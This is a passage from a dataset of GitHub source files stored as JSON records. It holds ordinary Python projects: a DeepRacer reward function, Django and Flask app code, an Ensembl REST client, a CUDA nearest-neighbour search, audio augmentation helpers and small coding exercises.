marker_2:\n reward = 1.25\n elif distance_from_center > marker_1:\n reward = 1.15\n else:\n reward = 1\n\n\n if off_track:\n reward = 1e-3\n\n if is_reversed:\n reward = 1e-3\n\n # Steering penality threshold, change the number based on your action space setting\n ABS_STEERING_THRESHOLD = 15\n\n # Penalize reward if the agent is steering too much\n if steering > ABS_STEERING_THRESHOLD:\n reward *= 0.8\n if speed < 1.0:\n reward *= 0.80\n else:\n reward += speed\n\n\n return float(reward)\n","repo_name":"rvignav/DeepRacer2020","sub_path":"DeepRacer.py","file_name":"DeepRacer.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22827259961","text":"from django.urls import path\nfrom django.contrib.auth.views import LoginView, LogoutView\n\nfrom .views import (register, home, update_todo, delete_todo, toggle_todo_status)\n\nurlpatterns = [\n path(\"login/\", LoginView.as_view(template_name=\"todo/login.html\"), name=\"login\"),\n path(\"logout/\", LogoutView.as_view(template_name=\"todo/logout.html\"), name=\"logout\"),\n path(\"register/\", register, name=\"register\"),\n\n path(\"\", home, name=\"home\"),\n\n path(\"update/todo//\", update_todo, name=\"update_todo\"),\n path(\"complete/todo//\", toggle_todo_status, name=\"toggle_todo_status\"),\n path(\"delete/todo//\", delete_todo, name=\"delete_todo\"),\n]","repo_name":"maxbratuta/todoapp","sub_path":"todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23535052847","text":"import sys\nfrom subprocess import PIPE, Popen, STDOUT\n\nfrom .configuration import cfg\nfrom .tests import checkTests, testNames\nfrom .utils import notif, warn\n\n\ndef checkAgrumMemoryLeak(x, percent):\n cmd = f'{sys.executable} act test debug -t {x} -m all'\n\n first = cfg.C_VALUE + f\"[{percent:5.1f}%] \"\n second = cfg.C_WARNING + x + cfg.C_END + \" : \"\n flag = 0\n\n sys.stdout.write(first + second)\n sys.stdout.flush()\n\n proc = Popen(cmd + \" --no-fun\", shell=True, stdout=PIPE, stderr=STDOUT)\n out = proc.stdout.readlines()\n for line in out:\n if b\"NO MEMORY LEAK\" in line:\n last = cfg.C_VALUE + \"ok\" + cfg.C_END\n flag = 1\n elif b\"Memory leaks found\" in line:\n line=str(line)\n last = cfg.C_ERROR + line.split(\"|\")[2].strip() + cfg.C_END\n flag = 2\n\n if flag == 0:\n last = cfg.C_ERROR + \"?\" + cfg.C_END\n\n print(last)\n return (second + last, flag == 1)\n\n\ndef checkAgrumMemoryLeaks(current):\n notif(\"Searching leaks test by test (may be a bit long).\\n\")\n\n res = []\n testslist = sorted(testNames(checkTests(current)))\n for i, x in enumerate(testslist):\n (msg, testOK) = checkAgrumMemoryLeak(x, (i + 1) * 100.0 / len(testslist))\n if not testOK:\n res.append(msg)\n\n sres=\"\\n -\".join(res) if len(res) > 0 else cfg.C_VALUE + \"none\"\n print(\"\\n\" + cfg.C_WARNING + f\"Test(s) with problem(s) :\\n -{sres}\\n\" + cfg.C_END)\n","repo_name":"agrumery/aGrUM","sub_path":"acttools/oneByOne.py","file_name":"oneByOne.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"34"} +{"seq_id":"72000506601","text":"# Given an array of integers, find the one that appears an odd number of times.\n# There will always be only one integer that appears an odd number of times.\n\n\n\ndef find_it(seq):\n for i in seq:\t\t# iterate through array\n \tcount = 0\t\t\n \tfor j in seq:\t# iterate through, if i = j increase count\n \t\tif i == j:\n \t\t\tcount += 1\n \tif count % 2 !=0:\t# if count returns odd num, return that num\n \t\treturn i\n return None\n ","repo_name":"FrazierMark/code_wars_kata_a_day","sub_path":"find_the_odd_int (1-18-21).py","file_name":"find_the_odd_int (1-18-21).py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30165141178","text":"from flask_bcrypt import Bcrypt\r\nfrom flask_login import LoginManager\r\nfrom flask_openid import OpenID\r\nfrom flask_principal import Principal, Permission, RoleNeed\r\n\r\nfrom flask_celery import Celery\r\nfrom flask_mail import Mail\r\n\r\nfrom flask_cache import Cache\r\n\r\nfrom flask_assets import Environment, Bundle\r\nfrom flask_admin import Admin\r\nfrom flask_restful import Api\r\n\r\n# Create the Flask-Bcrypt's instance\r\nbcrypt = Bcrypt()\r\n\r\n# Create the Flask-OpenID's instance\r\nopenid = OpenID()\r\n\r\n# Create the Flask-Login's instance\r\nlogin_manager = LoginManager()\r\n\r\n\r\nlogin_manager.login_view = \"main.login\"\r\nlogin_manager.session_protection = \"strong\"\r\nlogin_manager.login_message = \"Please login to access this page.\"\r\nlogin_manager.login_message_category = \"info\"\r\n\r\n# Create the Flask-Principal's instance\r\nprincipals = Principal()\r\n\r\n# Create the Flask-Celery-Helper's instance\r\nflask_celery = Celery()\r\n\r\n# Create the Flask-Mail's instance\r\nmail = Mail()\r\n\r\n#### Create the Flask-Cache's instance\r\ncache = Cache()\r\n\r\n#### Create the Flask-Admin's instance\r\nflask_admin = Admin()\r\n\r\n#### Create the Flask-Restful's instance\r\nrestful_api = Api()\r\n\r\n\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n \"\"\"Load the user's info.\"\"\"\r\n\r\n from .models import User\r\n return User.query.filter_by(id=user_id).first()\r\n\r\n\r\n# 这里设定了 3 种权限, 这些权限会被绑定到 Identity 之后才会发挥作用.\r\n# Init the role permission via RoleNeed(Need).\r\nadmin_permission = Permission(RoleNeed('admin'))\r\nposter_permission = Permission(RoleNeed('poster'))\r\ndefault_permission = Permission(RoleNeed('default'))\r\n\r\n#### Create the Flask-Assets's instance\r\nassets_env = Environment()\r\n# Define the set for js and css file.\r\nmain_css = Bundle(\r\n 'css/bootstrap.css',\r\n 'css/bootstrap-theme.css',\r\n filters='cssmin',\r\n output='assets/css/common.css')\r\n\r\nmain_js = Bundle(\r\n 'js/bootstrap.js',\r\n filters='jsmin',\r\n output='assets/js/common.js')\r\n\r\n","repo_name":"qianqian0223/qianqian-blog","sub_path":"qianblog/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42353455951","text":"from banco import db\nfrom datetime import datetime\n\n\nclass Proposta(db.Model):\n __tablename__ = 'propostas'\n id = db.Column(db.Integer, autoincrement=True, primary_key=True)\n nome = db.Column(db.String(80), nullable=False)\n desc = db.Column(db.String(120))\n email = db.Column(db.String(80), nullable=False)\n valor = db.Column(db.Float, nullable=False)\n data_cad = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n\n carro_id = db.Column(db.Integer, db.ForeignKey(\n 'carros.id'), nullable=False)\n\n carros = db.relationship('Carro')\n\n def to_json(self):\n json_propostas = {\n 'id': self.id,\n 'nome': self.nome,\n 'email': self.email,\n 'desc': self.desc,\n 'valor': self.valor,\n 'carro_id': self.carro_id\n\n }\n return json_propostas\n\n @staticmethod\n def from_json(json_propostas):\n \n nome = json_propostas.get('nome')\n email = json_propostas.get('email')\n desc = json_propostas.get('desc')\n valor = json_propostas.get('valor')\n carro_id = json_propostas.get('carro_id')\n return Proposta(nome=nome, email=email, desc=desc, valor=valor, carro_id=carro_id)\n","repo_name":"robertopinho/Revenda","sub_path":"models/modelProposta.py","file_name":"modelProposta.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3580672891","text":"\"\"\"Packaging settings.\"\"\"\n\n\nfrom codecs import open\nimport os\nfrom os.path import abspath, dirname, join\nfrom subprocess import call\n\nfrom setuptools import Command, find_packages, setup\n\nfrom gitlabber import __version__\n\n\nthis_dir = abspath(dirname(__file__))\nwith open(join(this_dir, 'README.rst'), encoding='utf-8') as file:\n long_description = file.read()\n\n\nclass RunTests(Command):\n \"\"\"Run all tests.\"\"\"\n description = 'run tests'\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n \"\"\"Run all tests!\"\"\"\n errno = call(['py.test'])\n raise SystemExit(errno)\nsetup(\n python_requires='>=3',\n name = 'gitlabber',\n packages = ['gitlabber'],\n version = __version__,\n description = 'A Gitlab clone/pull utility for backing up or cloning Gitlab groups',\n long_description = long_description,\n url = 'https://github.com/ezbz/gitlabber',\n download_url = 'https://github.com/ezbz/gitlabber/archive/master.zip',\n author = 'Erez Mazor',\n author_email = 'erezmazor@gmail.com',\n license = 'MIT',\n keywords = ['gitlab', 'python', 'cli'], \n include_package_data = True,\n\n classifiers = [\n 'Development Status :: 4 - Beta', \n 'Intended Audience :: Developers',\n 'Topic :: Utilities',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3', \n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9'\n ],\n setup_requires = [\n 'docopt', \n 'anytree', \n 'globre',\n 'pyyaml',\n 'tqdm',\n 'GitPython', \n 'python-gitlab'\n ],\n install_requires = [\n 'docopt', \n 'anytree', \n 'globre', \n 'pyyaml',\n 'tqdm',\n 'GitPython', \n 'python-gitlab'\n ],\n tests_require= ['coverage', 'pytest', 'pytest-cov', 'pytest-integration'],\n entry_points = {\n 'console_scripts': [\n 'gitlabber=gitlabber.cli:main',\n ],\n },\n cmdclass = {'test': RunTests},\n)\n","repo_name":"ezbz/gitlabber","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":445,"dataset":"github-code","pt":"18"} +{"seq_id":"5412570964","text":"#!/usr/bin/env python\n\n# Python 3 compatible\n\nimport urllib.request\nimport urllib.parse\nimport urllib.error\n\nimport json\nimport time\nimport re\nimport sys\n\n\nclass EnsemblRestClient(object):\n def __init__(self, server='http://rest.ensembl.org/', reqs_per_sec=15):\n self.server = server\n self.reqs_per_sec = reqs_per_sec\n self.req_count = 0\n self.last_req = 0\n\n def perform_rest_action(self, endpoint, hdrs=None, params=None, doseq=0):\n if hdrs is None:\n hdrs = {}\n\n if 'Content-Type' not in hdrs:\n hdrs['Content-Type'] = 'application/json'\n\n if params:\n endpoint += '?' + urllib.parse.urlencode(params, doseq)\n\n data = None\n\n # check if we need to rate limit ourselves\n if self.req_count >= self.reqs_per_sec:\n delta = time.time() - self.last_req\n if delta < 1:\n time.sleep(1 - delta)\n self.last_req = time.time()\n self.req_count = 0\n\n try:\n request = urllib.request.Request(self.server + endpoint, headers=hdrs)\n response = urllib.request.urlopen(request)\n content = response.read().decode('utf-8')\n\n if content:\n data = json.loads(content)\n self.req_count += 1\n\n except urllib.error.HTTPError as e:\n # check if we are being rate limited by the server\n if e.code == 429:\n if 'Retry-After' in e.headers:\n retry = e.headers['Retry-After']\n time.sleep(float(retry) + 1.0)\n self.perform_rest_action(endpoint, hdrs)\n else:\n sys.stderr.write('Request failed for {0}: Status code: {1.code} Reason: {1.reason}\\n'.format(endpoint, e))\n\n return data\n\n def get_ensembl_id(self, species, symbol, only_stable_id=True):\n \"\"\"\n Return an ensembl ID for the species gene symbol.\n\n Parameters:\n -----------\n species - A species name, e.g., human\n symbol - A gene symbol, e.g., BRAF\n only_stable_id - If true returns only the first gene in the list of genes\n given by the sever.\n else it will return the full JSON object.\n \"\"\"\n\n genes = self.perform_rest_action(\n '/xrefs/symbol/{0}/{1}'.format(species, symbol),\n params={'object_type': 'gene'}\n )\n\n if genes:\n if only_stable_id:\n stable_id = genes[0]['id']\n return(stable_id)\n\n return(genes)\n\n return None\n\n def get_variants(self, species, symbol):\n stable_id = self.get_ensembl_id(species, symbol)\n\n if stable_id:\n variants = self.perform_rest_action(\n '/overlap/id/{0}'.format(stable_id),\n params={'feature': 'variation'}\n )\n return variants\n\n return None\n\n def get_ensembl_info(self, identifier, expand=False):\n \"\"\"\n Returns basic information on the given identifier.\n\n Parameters:\n -----------\n identifier - Ensembl identifier, e.g., ENSE00001939332.\n expand - Expands the search to include any connected features,\n e.g., if the object is a gene, its transcripts,\n translations and exons will be returned as well.\n \"\"\"\n if expand:\n ext = \"/lookup/id/{0}?expand=1\".format(identifier)\n else:\n ext = \"/lookup/id/{0}?\".format(identifier)\n\n info = self.perform_rest_action(ext)\n\n if info:\n return(info)\n\n return(None)\n\n def get_overlap(self, species='human', region='7:140424943-140624564', features=None):\n \"\"\"Return\n\n Parameters:\n -----------\n species - The organism whose genome is to be searched.\n region - The region within the genom to search.\n features - A list of feature to retrieve. Multiple values are accepted.\n Enum(gene, transcript, cds, exon, repeat, simple, misc, variation,\n somatic_variation, structural_variation, somatic_structural_variation,\n constrained, regulatory, segmentation, motif, chipseq, array_probe).\n \"\"\"\n features = features or ['gene']\n # Format the region into an appropriate format for query.\n region = self.format_region(region)\n\n info = self.perform_rest_action(\n '/overlap/region/{0}/{1}'.format(species, region),\n params={'feature': features},\n doseq=1\n )\n\n if info:\n return(info)\n\n return(None)\n\n @staticmethod\n def format_region(region):\n \"\"\"Return the region in the correct format for submission to Ensembl.\n\n Parameters:\n -----------\n region - Either a coordinate string, chr7:123311-212131-,\n or a list, ['7', '123311', '212131']\n\n \"\"\"\n try:\n m = re.search(r'([XY]|[0-9]*):[0-9]*-[0-9]*', region)\n return(m.group())\n except TypeError:\n return(region[0] + ':' + str(region[1]) + '-' + str(region[2]))\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 3:\n species, symbol = sys.argv[1:]\n else:\n species, symbol = 'mouse', 'BRAF'\n\n # Optional server\n # client = EnsemblRestClient(server='http://grch37.rest.ensembl.org/')\n client = EnsemblRestClient()\n\n variants = client.get_variants(species, symbol)\n if variants:\n for v in variants:\n print('{seq_region_name}:{start}-{end}:{strand} ==> {id} ({consequence_type})'.format(**v))\n print()\n\n genes = client.get_ensembl_id(species, symbol)\n print(genes, end='\\n\\n')\n\n overlapping = client.get_overlap(species='human')\n print(overlapping, end='\\n\\n')\n","repo_name":"okeeffdp/python_ensembl_rest_client","sub_path":"ensemblAPI.py","file_name":"ensemblAPI.py","file_ext":"py","file_size_in_byte":5993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"71427489640","text":"import numpy as np # linear algebra\n\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\nimport librosa\n\nimport matplotlib.pyplot as plt\n\nimport os\n\nimport cv2\n\nimport IPython.display as ipd\n\nfrom IPython.display import Audio, IFrame, display\n\nimport plotly.graph_objects as go\n\nimport librosa\n\nimport librosa.display\n\nplt.style.use(\"ggplot\")\n\ntrain = pd.read_csv(\"../input/birdsong-recognition/train.csv\")\n\nspecies=train.species.value_counts()\n\nfig = go.Figure(data=[\n\n go.Bar(y=species.values, x=species.index,marker_color='deeppink')\n\n])\n\n\n\nfig.update_layout(title='Distribution of Bird Species')\n\nfig.show()\nfile_path='../input/birdsong-resampled-train-audio-04/wooscj2/XC67042.wav'\n\nx , sr = librosa.load(file_path)\n\nlibrosa.display.waveplot(x, sr=sr)\n\nAudio(x, rate=sr)\ndef noise(data, noise_factor):\n\n noise = np.random.randn(len(data))\n\n augmented_data = data + noise_factor * noise\n\n # Cast back to same data type\n\n augmented_data = augmented_data.astype(type(data[0]))\n\n return augmented_data\nn=noise(x,0.01)\n\nlibrosa.display.waveplot(n, sr=sr)\ndef shifting_time(data, sampling_rate, shift_max, shift_direction):\n\n shift = np.random.randint(sampling_rate * shift_max)\n\n if shift_direction == 'right':\n\n shift = -shift\n\n elif self.shift_direction == 'both':\n\n direction = np.random.randint(0, 2)\n\n if direction == 1:\n\n shift = -shift\n\n augmented_data = np.roll(data, shift)\n\n # Set to silence for heading/ tailing\n\n if shift > 0:\n\n augmented_data[:shift] = 0\n\n else:\n\n augmented_data[shift:] = 0\n\n return augmented_data\ns=shifting_time(x,sr,1,'right')\n\nlibrosa.display.waveplot(s, sr=sr)\ndef speed(data, speed_factor):\n\n return librosa.effects.time_stretch(data, speed_factor)\nv=speed(x,2)\n\nlibrosa.display.waveplot(v, sr=sr)\ndef pitch(data, sampling_rate, pitch_factor):\n\n return librosa.effects.pitch_shift(data, sampling_rate, pitch_factor)\np=pitch(x,sr,2)\n\nlibrosa.display.waveplot(p, sr)","repo_name":"aorursy/new-nb-3","sub_path":"jainarindam_audio-augmentation-methods.py","file_name":"jainarindam_audio-augmentation-methods.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27387885649","text":"from datetime import datetime\nfrom hurry.filesize import filesize\nfrom numba import cuda\nimport numpy as np\nimport pandas as pd\nimport os\n\nos.environ['CUDA_HOME'] = \"/opt/cuda/\"\n\nARCHIVE_REGISTER_THRESHOLD = 1000\nNEIGHBOURS_ARCHIVE_SIZE = 20\n\nSEARCH_SIZE = 200\n\nUPDATE_SUPPORT_NEIGHBOURS = 3\n\nCURRICULUM_SIZE = 1000\n\nrows = CURRICULUM_SIZE # start with small number of records and increase at every level\nITERATIONS_PER_CURRICULUM_LEVEL = 10\n\n\n@cuda.jit\ndef neighbour_search_step(H, search_i, archive_i, archive_d, observed_mean_arr, rows_this_curr,\n curriculum_num, iteration_num):\n x = cuda.grid(1)\n # execute for each row\n N = rows_this_curr[0]\n if x >= N:\n return\n observed_count = 0\n observed_sum = 0\n for run in range(SEARCH_SIZE):\n if run < (SEARCH_SIZE / 2):\n search_index = search_i[x, run] % N\n else:\n other_row = (x + curriculum_num[0] * ITERATIONS_PER_CURRICULUM_LEVEL + iteration_num[0]) % N\n search_index = search_i[other_row, run] % N\n if search_index == x:\n continue\n\n dist = 0\n for i in range(256): # for all integer encodings of LSH bits\n # xor to see flipped bits\n var0 = H[x, i] ^ H[search_index, i]\n\n # population count algorithm\n var0 -= var0 >> 1 & 1431655765\n var0 = (var0 & 858993459) + (var0 >> 2 & 858993459)\n var0 = var0 + (var0 >> 4) & 252645135\n var0 += var0 >> 8\n var0 += var0 >> 16\n dist += var0 & 63\n\n observed_count += 1\n observed_sum += dist\n\n # find location to insert\n FLAG_NOT_duplicate = True\n insert_index = 0\n while archive_d[x, insert_index] <= dist and insert_index < NEIGHBOURS_ARCHIVE_SIZE:\n if archive_i[x, insert_index] == search_index:\n FLAG_NOT_duplicate = False\n break\n insert_index += 1\n\n if insert_index < NEIGHBOURS_ARCHIVE_SIZE and FLAG_NOT_duplicate:\n if archive_i[x, insert_index] == -1:\n # add in an empty space\n archive_i[x, insert_index] = search_index\n archive_d[x, insert_index] = dist\n else:\n # insert item and move other items right\n temp_i_1, temp_d_1 = archive_i[x, insert_index], archive_d[x, insert_index]\n archive_i[x, insert_index] = search_index\n archive_d[x, insert_index] = dist\n\n itr = insert_index + 1\n while itr < NEIGHBOURS_ARCHIVE_SIZE:\n temp_i_2, temp_d_2 = archive_i[x, itr], archive_d[x, itr]\n archive_i[x, itr] = temp_i_1\n archive_d[x, itr] = temp_d_1\n temp_i_1, temp_d_1 = temp_i_2, temp_d_2\n itr += 1\n\n observed_mean_arr[x] = observed_sum / observed_count\n\n\n@cuda.jit()\ndef update_step(search_i, archive_i, rows_this_curr):\n \"\"\"\n Update step where points look at closest neighbours' archives and add it to their own search array\n search array of any point can have duplicate entries but the neighbour-search makes sure duplicates are not added to the archive.\n \"\"\"\n x = cuda.grid(1)\n # execute for each row\n if x >= rows_this_curr[0]:\n return\n update_window = int(SEARCH_SIZE / 2 / UPDATE_SUPPORT_NEIGHBOURS)\n\n for i in range(UPDATE_SUPPORT_NEIGHBOURS):\n close_neighbour = archive_i[x, i]\n for j in range(update_window):\n archive_item_to_search = archive_i[close_neighbour, j]\n search_i[x, int(i * update_window + j)] = archive_item_to_search\n\n\nclass ApproxNearestNeighboursCUDA:\n\n def calc_quality_metrics(self, archive_d_qual, observed_mean_arr_qual, rows_, rows_curr_gpu):\n blocks_per_grid_quality = min([rows_, 1000])\n threads_per_block_quality = int(rows_ / blocks_per_grid_quality) + 1\n quality_sum = cuda.to_device(np.zeros(shape=rows_, dtype=np.int32))\n\n @cuda.jit\n def quality_sum_kernal(archive_d, qual_sum, rows_this_curr):\n x = cuda.grid(1)\n # execute for each row\n if x >= rows_this_curr[0]:\n return\n sum_ = 0\n for i in range(int(NEIGHBOURS_ARCHIVE_SIZE / 2)):\n sum_ += archive_d[x, i]\n qual_sum[x] = sum_\n\n quality_sum_kernal[blocks_per_grid_quality, threads_per_block_quality](archive_d_qual, quality_sum,\n rows_curr_gpu)\n cuda.synchronize()\n quality_sum = quality_sum.copy_to_host()\n\n observed_means = observed_mean_arr_qual.copy_to_host()[0:rows_]\n\n return np.mean(quality_sum), np.std(quality_sum), np.mean(observed_means), np.std(observed_means)\n\n def get_observed_dist(self, ):\n # TODO\n pass\n\n def run(self, df: pd.DataFrame, features_column: str, verbose: bool = True):\n stats = []\n ROWS_MAX = df.shape[0]\n CURRICULUM_LEVELS = int(ROWS_MAX / CURRICULUM_SIZE)\n if ROWS_MAX % CURRICULUM_SIZE != 0:\n CURRICULUM_LEVELS += 1\n A = np.array(df[features_column].values.tolist(), dtype=np.int32)\n\n A_gpu = cuda.to_device(A)\n if verbose: print(f\"A_gpu.alloc_size = {A_gpu.alloc_size}\")\n\n archive_index = cuda.to_device(np.ones(shape=(ROWS_MAX, NEIGHBOURS_ARCHIVE_SIZE), dtype=np.uint32) * -1)\n if verbose: print(f\"archive_index.alloc_size = {filesize.size(archive_index.alloc_size)}\")\n\n archive_dist = cuda.to_device(\n np.ones(shape=(ROWS_MAX, NEIGHBOURS_ARCHIVE_SIZE), dtype=np.uint16) * np.iinfo(np.uint16).max)\n if verbose: print(f\"archive_dist.alloc_size = {filesize.size(archive_dist.alloc_size)}\")\n\n search_matrix_index = cuda.to_device(\n np.random.randint(low=0, high=np.iinfo(np.int32).max, size=(ROWS_MAX, SEARCH_SIZE), dtype=np.uint32))\n if verbose: print(f\"search_matrix_index.alloc_size = {filesize.size(search_matrix_index.alloc_size)}\")\n\n observed_means_arr = cuda.to_device(\n np.empty(shape=(ROWS_MAX), dtype=np.float32))\n if verbose: print(f\"observed_means_arr.alloc_size = {filesize.size(observed_means_arr.alloc_size)}\")\n\n FLAG_tempering = False\n for curriculum_level in range(CURRICULUM_LEVELS):\n if verbose: print(f\"CURRICULUM_LEVEL = {curriculum_level + 1}/{CURRICULUM_LEVELS}\")\n rows = int(CURRICULUM_SIZE * (curriculum_level + 1))\n if rows >= ROWS_MAX:\n rows = ROWS_MAX\n FLAG_tempering = True\n\n if verbose: print(f\"number of rows (recordings) = {rows}\")\n\n curriculum_level_gpu = cuda.to_device(np.array([curriculum_level], dtype=np.int32))\n rows_gpu = cuda.to_device(np.array([rows], dtype=np.int32))\n\n blocks_per_grid = min([int(rows / 10), 50000])\n threads_per_block = int(rows / blocks_per_grid) + 1\n\n with cuda.defer_cleanup():\n # iterations of the Search and Update steps\n iterations_this_round = ITERATIONS_PER_CURRICULUM_LEVEL\n if FLAG_tempering:\n iterations_this_round = int(ITERATIONS_PER_CURRICULUM_LEVEL * 5)\n\n for iteration in range(iterations_this_round):\n iteration_gpu = cuda.to_device(np.array([iteration], dtype=np.int32))\n # neighbour search\n neighbour_search_step[blocks_per_grid, threads_per_block](\n A_gpu, search_matrix_index, archive_index, archive_dist, observed_means_arr,\n rows_gpu, curriculum_level_gpu, iteration_gpu)\n\n # Wait for GPU to complete\n cuda.synchronize()\n\n # update search direction based on archive: sees archive_index and updates search_matrix_index\n update_step[blocks_per_grid, threads_per_block](search_matrix_index, archive_index, rows_gpu)\n\n # print(search_matrix_index.copy_to_host()[200000, :])\n\n # Evaluate Solution Quality: sees archive_dist and updates search_i\n quality_mean, quality_std, obs_mean, obs_std = self.calc_quality_metrics(archive_dist,\n observed_means_arr,\n rows,\n rows_gpu)\n if verbose: print(f\"quality indicator: mean={quality_mean}\\tstd={quality_std}\\t|\\t \"\n f\"observed: mean={obs_mean}\\tstd={obs_std}\")\n\n stats.append(\n [datetime.now(), curriculum_level, iteration, rows, quality_mean, quality_std, obs_mean,\n obs_std])\n\n # wait for all computations to complete\n cuda.synchronize()\n\n df['row_id'] = np.arange(df.shape[0]).astype(np.int32)\n df['neighbours'] = [x for x in\n archive_index.copy_to_host().astype(np.int32)[:, 0:int(NEIGHBOURS_ARCHIVE_SIZE / 2)]]\n df['neighbour_dist'] = [x for x in\n archive_dist.copy_to_host().astype(np.int32)[:, 0:int(NEIGHBOURS_ARCHIVE_SIZE / 2)]]\n stats_df = pd.DataFrame(data=stats, columns=['timestamp', 'curriculum_level', 'iteration', 'rows',\n 'quality_indicator_mean', 'quality_indicator_std',\n 'observed_mean', 'observed_std'])\n return df, stats_df\n","repo_name":"sharwinbobde/MLHD-insights","sub_path":"python-code/src/AcousticBrainz/ApproxNearestNeighboursCUDA.py","file_name":"ApproxNearestNeighboursCUDA.py","file_ext":"py","file_size_in_byte":9841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14144829966","text":"import logging\nimport re\n\nimport requests as requests\nfrom easygui import enterbox\n\nfrom bundleinfo import BundleInfo\n\n\nclass ItchIoBundleGetter:\n class InvalidItchIoBundleException(Exception):\n pass\n\n def __init__(self):\n self.logger = logging.getLogger(__name__)\n\n def get_bundle(self) -> BundleInfo:\n url_or_id = enterbox('Please enter Itch.io bundle URL or ID:')\n pattern = re.compile(r'^https://itch\\.io/b/(\\d+)/.*$|^(\\d+)$')\n match = pattern.match(url_or_id)\n if not match:\n self.logger.error('Provided Itch.io bundle URL or ID is invalid!')\n raise self.InvalidItchIoBundleException()\n id = next(obj for obj in match.groups() if obj)\n\n self.logger.info('Retrieving bundle information from Itch.io')\n response = requests.get(f'https://itch.io/bundle/{id}/games.json')\n if response.status_code != 200:\n self.logger.error('Could not retrieve Itch.io bundle information!')\n raise self.InvalidItchIoBundleException()\n\n json = response.json()\n return self.convert(id, json)\n\n @staticmethod\n def convert(id, json) -> BundleInfo:\n games = json['games']\n bundle_info = BundleInfo()\n bundle_info.bundle_id = id\n for game in games:\n game_info = BundleInfo.GameInfo()\n game_info.name = game['title']\n bundle_info.games.append(game_info)\n return bundle_info\n","repo_name":"donthub/itch-io-steam-bundle-info","sub_path":"itchiobundlegetter.py","file_name":"itchiobundlegetter.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23307074949","text":"import falcon\nfrom falcon import testing\nimport json\nimport pytest\nfrom hipchat.api import api\n\n@pytest.fixture\ndef client():\n return testing.TestClient(api)\n\ndef test_links(client):\n params = {\"input\": \"Have you ever visited http://atlassian.com and http://google.com.ua\"}\n doc = {\n \"links\": [ { \"url\": \"http://atlassian.com\", \"title\": \"Atlassian | Software Development and Collaboration Tools\"}, \n\t {\"url\": \"http://google.com.ua\", \"title\": \"Google\"} ]\n }\n\n response = client.simulate_get('/', params=params)\n\n assert response.content == json.dumps(doc)\n assert response.status == falcon.HTTP_OK\n\n","repo_name":"VolodymyrSlav/Hipchat_task","sub_path":"hipchat/tests/test_links.py","file_name":"test_links.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25846437639","text":"from django import forms\nfrom .models import Product\n\n\nclass ProductForm(forms.ModelForm):\n class Meta:\n model = Product\n fields = ('art', 'model', 'color', 'size', 'structure', 'shipment', 'count', 'seller', 'date_name')\n\n\nclass Filter(forms.Form):\n filter_seller = forms.ChoiceField(choices=(\n ('GUM', 'GUM'),\n ('SLAVUTINY', 'SLAVUTINY'),\n ('SALON', 'SALON')\n ))\n\n\nclass FilterDate(forms.Form):\n filter_date = forms.ChoiceField(choices=(\n ('WEEK', 'WEEK'),\n ('MONTH', 'MONTH'),\n ))\n","repo_name":"Jendobas/accounting_table","sub_path":"tab/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29273750421","text":"from sys import stdin, stdout\nimport sys\nsys.setrecursionlimit(10000)\nmemo = [0] * 5010\n\ndef fib(n):\n if n == 0: return 0\n if n == 1: return 1\n if memo[n]: return memo[n]\n memo[n] = fib(n-1) + fib(n-2)\n return memo[n]\n\nfor line in stdin:\n n = int(line)\n stdout.write(\"The Fibonacci number for {} is {}\\n\".format(n, fib(n)))\n","repo_name":"Edmond-Mo/online_judge","sub_path":"UVa/UVa00495_fibonacci_freeze.py","file_name":"UVa00495_fibonacci_freeze.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10534801714","text":"import sys\n\ninput = sys.stdin.readline\nsys.setrecursionlimit(10**6)\n\ndef dfs(depth):\n if depth == n:\n print(*ans)\n return\n \n for i in range(n):\n if not mark[i]:\n mark[i] = True\n ans.append(data[i])\n dfs(depth+1)\n ans.pop()\n mark[i] = False\n\n\nif __name__ == \"__main__\":\n n = int(input())\n data = [i + 1 for i in range(n)]\n mark = [False] * n\n\n ans = []\n dfs(0)","repo_name":"tsinghua-auto4/ct_note","sub_path":"BOJ/2301/12/김동현_10974_모든 순열.py","file_name":"김동현_10974_모든 순열.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} 